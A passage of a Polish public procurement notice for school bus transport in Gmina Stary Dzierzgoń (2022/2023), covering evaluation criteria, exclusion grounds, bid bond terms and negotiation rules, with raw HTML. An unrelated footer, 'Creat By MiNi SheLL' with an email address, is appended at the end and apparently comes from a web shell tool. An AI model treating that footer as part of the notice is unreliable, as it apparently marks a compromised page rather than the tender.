pojazd do którego posiada inny tytuł prawny;<br/>b)	pojazd dopuszczony do ruchu drogowego i przeznaczony do transportu osób, musi posiadać ubezpieczenie OC, NNW, aktualne badania techniczne, nienaganny stan techniczny – Zamawiający zastrzega sobie prawo kontroli dokumentów potwierdzających stan techniczny pojazdów;<br/>c)	w okresie zimowym wnętrze pojazdów musi być ogrzewane, ponadto Wykonawca będzie dbał o to aby stopnie wejściowe do pojazdu nie były śliskie i nie zalegał na nich lód;<br/>d)	pojazd zapewniający niezbędne bezpieczeństwo i komfort jazdy, musi być utrzymany w czystości z zachowaniem estetyki wewnętrznej i zewnętrznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">długość terminu płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu;<br/>2)	spełniają warunki udziału w postępowaniu, określone w ogłoszeniu o zamówieniu oraz niniejszej specyfikacji warunków zamówienia.<br/>2.	Warunki udziału w postępowaniu dotyczą:<br/>1)	zdolności do występowania w obrocie gospodarczym,<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>Posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej: aktualnie obowiązujące zezwolenie na wykonywanie zawodu przewoźnika drogowego, na zasadach określonych w rozporządzeniu Parlamentu Europejskiego <br/>i Rady (WE) nr 1071/2009 z dnia 21 października 2009 r. ustanawiającym wspólne zasady dotyczące warunków wykonywania zawodu przewoźnika drogowego osób <br/>z kierowcą, aktualnie obowiązującej, odpowiedniej licencji na wykonywanie krajowego transportu drogowego osób lub zezwolenie na wykonywanie zawodu przewoźnika drogowego osób.<br/>3)	sytuacji ekonomicznej lub finansowej,<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/>4)	zdolności technicznej lub zawodowej<br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>a)	Część I<br/> Wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 1 usługę przewozu uczniów do szkół na łączną kwotę brutto minimum 200 000,00 zł. <br/>W przypadku usługi wykonywanej wymóg dotyczący wartości dotyczy tej części usługi, która już została wykonana.<br/>Część II<br/> Wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 1 usługę przewozu uczniów do szkół na łączną kwotę brutto minimum 10 000,00 zł. <br/>W przypadku usługi wykonywanej wymóg dotyczący wartości dotyczy tej części usługi, która już została wykonana. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 ze zm.), <br/>z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zał. Nr 7;<br/>2) Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3) Wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty wykonania, miejsca wykonania i podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - zał. Nr 6;<br/>•	Część I<br/> Wymagane jest wykazanie przez Wykonawcę wykonania w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej 1 usługę przewozu uczniów do szkół na łączną kwotę brutto minimum 200 000,00 zł. W przypadku usługi wykonywanej wymóg dotyczący wartości dotyczy tej części usługi, która już została wykonana.<br/>•	Część II<br/> Wymagane jest wykazanie przez Wykonawcę wykonania w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej 1 usługę przewozu uczniów do szkół na łączną kwotę brutto minimum 10 000,00 zł. W przypadku usługi wykonywanej wymóg dotyczący wartości dotyczy tej części usługi, która już została wykonana.<br/>4) Aktualnie obowiązujące zezwolenie na wykonywanie zawodu przewoźnika drogowego, na zasadach określonych w rozporządzeniu Parlamentu Europejskiego i Rady (WE) <br/>nr 1071/2009 z dnia 21 października 2009 r. ustanawiającym wspólne zasady dotyczące warunków wykonywania zawodu przewoźnika drogowego osób z kierowcą, aktualnie obowiązującej, odpowiedniej licencji na wykonywanie krajowego transportu drogowego osób lub zezwolenie na wykonywanie zawodu przewoźnika drogowego osób.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 ze zm.), <br/>z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zał. Nr 7;<br/>2) Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3) Wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty wykonania, miejsca wykonania i podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - zał. Nr 6;<br/>•	Część I<br/> Wymagane jest wykazanie przez Wykonawcę wykonania w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej 1 usługę przewozu uczniów do szkół na łączną kwotę brutto minimum 200 000,00 zł. W przypadku usługi wykonywanej wymóg dotyczący wartości dotyczy tej części usługi, która już została wykonana.<br/>•	Część II<br/> Wymagane jest wykazanie przez Wykonawcę wykonania w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej 1 usługę przewozu uczniów do szkół na łączną kwotę brutto minimum 10 000,00 zł. W przypadku usługi wykonywanej wymóg dotyczący wartości dotyczy tej części usługi, która już została wykonana.<br/>4) Aktualnie obowiązujące zezwolenie na wykonywanie zawodu przewoźnika drogowego, na zasadach określonych w rozporządzeniu Parlamentu Europejskiego i Rady (WE) <br/>nr 1071/2009 z dnia 21 października 2009 r. ustanawiającym wspólne zasady dotyczące warunków wykonywania zawodu przewoźnika drogowego osób z kierowcą, aktualnie obowiązującej, odpowiedniej licencji na wykonywanie krajowego transportu drogowego osób lub zezwolenie na wykonywanie zawodu przewoźnika drogowego osób.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Ustala się wadium dla Części I w wysokości: 4.000,00 zł słownie: cztery tysiące złotych gr. 00/100<br/>2. Ustala się wadium dla Części II w wysokości: 390,00 zł słownie: trzysta dziewięćdziesiąt złotych gr. 00/100<br/>3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:<br/>1) w pieniądzu,<br/>2) w gwarancjach bankowych,<br/>3) w gwarancjach ubezpieczeniowych,<br/>4) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: Urząd Gminy w Starym Dzierzgoniu, BS Susz Oddział w Starym Dzierzgoniu Nr 47 8320 0005 0030 0038 2000 0060 z adnotacją „Wadium – Dowóz dzieci z terenu Gminy Stary Dzierzgoń do placówek oświatowych w roku szkolnym 2022/2023”, Część nr …..<br/>5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>6. Wadium wniesione w pieniądzu należy złożyć z odpowiednim wyprzedzeniem, tak aby wpłynęło ono na rachunek bankowy Zamawiającego przed upływem terminu składania ofert. Powyższe zalecenie wynika z czasu trwania rozliczeń międzybankowych. Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego.<br/>7. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. Wadium w postaci elektronicznej nie może zawierać postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu gwarancyjnego do Gwaranta.<br/>8. Poręczenie, gwarancja lub inny dokument stanowiący wadium winno zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium na pierwsze pisemne żądanie Zamawiającego. Dokument ten winien obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium, określone w art. 98 ust. 6 ustawy Pzp.<br/>9. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji warunków zamówienia form wadium (niewniesienie wadium lub wniesienie w sposób nieprawidłowy) oferta wykonawcy podlegać będzie odrzuceniu.<br/>10. Zamawiający zwróci wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:<br/>1)	upływu terminu związania ofertą;<br/>2)	zawarcia umowy w sprawie zamówienia publicznego;<br/>3)	unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia<br/>11. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium wykonawcy:<br/>1)	który wycofał ofertę przed upływem terminu składania ofert;<br/>2)	którego oferta została odrzucona;<br/>3)	po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>4)	po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>12. Złożenie wniosku o zwrot wadium powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej.<br/>13. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.<br/>14. Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/>15. Zamawiający zatrzymuje wadium wraz z odsetkami, w przypadku wystąpienia przesłanek określonych w art. 98 ust. 6 ustawy Pzp.<br/>16. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 97 i 98 Prawa zamówień publicznych. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy, <br/>a pełnomocnictwo / upoważnienie do pełnienia takiej funkcji wystawione zgodnie z wymogami ustawowymi, podpisane przez prawnie upoważnionych przedstawicieli każdego z wykonawców występujących wspólnie należy załączyć do oferty.<br/>3.	Oferta winna być podpisana przez każdego z wykonawców występujących wspólnie lub przez upoważnionego przedstawiciela.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>5.	Jeżeli oferta wspólna złożona przez dwóch lub więcej wykonawców zostanie wyłoniona w prowadzonym postępowaniu jako najkorzystniejsza przed podpisaniem umowy zamawiający zażąda w wyznaczonym terminie złożenia umowy regulującej współpracę tych wykonawców, podpisanej przez wszystkich wykonawców, przy czym termin, na jaki została zawarta nie może być krótszy niż termin realizacji zamówienia.<br/>6.	Wykonawców obowiązują postanowienia działu XII &#34;Wykaz oświadczeń lub dokumentów, potwierdzających spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia &#34; w sprawie dokumentów wymaganych w przypadku składania oferty wspólnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Umowa w sprawie realizacji zamówienia publicznego zawarta zostanie z uwzględnieniem postanowień wynikających z treści niniejszej specyfikacji warunków zamówienia oraz danych zawartych w ofercie.<br/>2.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 455 ustawy PZP oraz wskazanym w Projektowanych Postanowieniach Umowy (PPU), stanowiącym Załącznik nr 8 i 8a do SWZ.<br/>3.	Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pomocą minipoprtalu; https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-06</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 1.	Zamawiający przewiduje możliwość przeprowadzenia negocjacji w celu ulepszenia treści ofert, które podlegają ocenie w ramach kryteriów oceny ofert.<br/>2.	Zamawiający korzysta z uprawnienia, o jakim stanowi art. 288 ust. 1 ustawy Pzp i zastrzega sobie prawo do zaproszenia do negocjacji maksymalnie trzech Wykonawców, których oferty przedstawiają najkorzystniejszy stosunek jakości do ceny, obliczony na podstawie kryteriów oceny ofert, określonych w dziale XXII niniejszej SWZ.<br/>3.	W przypadku podjęcia decyzji o prowadzeniu negocjacji, w pierwszym kroku Zamawiający poinformuje równocześnie wszystkich Wykonawców, którzy złożyli oferty, o Wykonawcach:<br/>a)	których oferty nie zostały odrzucone, oraz punktacji przyznanej ofertom w każdym kryterium oceny ofert i łącznej punktacji,<br/>b)	których oferty zostały odrzucone,<br/>podając uzasadnienie faktyczne i prawne.<br/>4.	Zamawiający w zaproszeniu do negocjacji wskaże miejsce, termin i sposób prowadzenia negocjacji oraz kryteria oceny ofert, w ramach których będą prowadzone negocjacje w celu ulepszenia treści ofert.<br/>5.	Prowadzone negocjacje mają poufny charakter. Żadna ze stron nie może, bez zgody drugiej strony, ujawniać informacji technicznych i handlowych związanych z negocjacjami. Zgoda jest udzielana w odniesieniu do konkretnych informacji i przed ich ujawnieniem.<br/>6.	Po zakończeniu negocjacji z Wykonawcami, Zamawiający informuje o tym fakcie uczestników negocjacji oraz zaprasza ich do składania ofert dodatkowych.<br/>7.	Zaproszenie do złożenia ofert dodatkowych będzie zawierać co najmniej:<br/>a)	nazwę oraz adres Zamawiającego, numer telefonu, adres poczty elektronicznej oraz strony internetowej prowadzonego postępowania,<br/>b)	sposób i termin składania ofert dodatkowych oraz język lub języki, w jakich muszą one być sporządzone, oraz termin otwarcia tych ofert.<br/>8.	Wykonawca może złożyć ofertę dodatkową, która zawiera nowe propozycje w zakresie treści oferty podlegających ocenie w ramach kryteriów oceny ofert wskazanych przez Zamawiającego w zaproszeniu do negocjacji.<br/>9.	Oferta dodatkowa nie może być mniej korzystna w żadnym z kryteriów oceny ofert wskazanych w zaproszeniu do negocjacji niż oferta złożona w odpowiedzi na ogłoszenie <br/>o zamówieniu.<br/>10. Oferta przestaje wiązać Wykonawcę w zakresie, w jakim złoży on ofertę dodatkową zawierającą korzystniejsze propozycje w ramach każdego z kryteriów oceny ofert wskazanych w zaproszeniu do negocjacji.<br/>11. Oferta dodatkowa, która jest mniej korzystna w którymkolwiek z kryteriów oceny ofert wskazanych w zaproszeniu do negocjacji niż oferta złożona w odpowiedzi na ogłoszenie o zamówieniu, podlega odrzuceniu. W przypadku skorzystania przez Zamawiającego z możliwości negocjowania treści ofert, negocjacje dotyczyć będą wyłącznie tych elementów treści ofert, które podlegają ocenie w ramach kryteriów oceny ofert.<br/>12. Wymagania dotyczące sporządzenia i przekazywania oferty określone w SWZ mają odpowiednie zastosowanie do oferty dodatkowej. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pozycja w planie postępowań o udzielenie zamówienia dla Części II &#34;Dowóz uczniów zamieszkałych na terenie Gminy Stary Dzierzgoń do Specjalnego Ośrodka Szkolno-Wychowawczego w Barcicach, Barcice 66, 82-420 Ryjewo oraz ich odwóz&#34; - 1.3.18<br/><br/>Zamawiający wykluczy z postępowania wykonawców, wobec których zachodzą przesłanki wykluczenia wskazane w art. 7<br/>ust. 1 ustawy z dnia 15 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com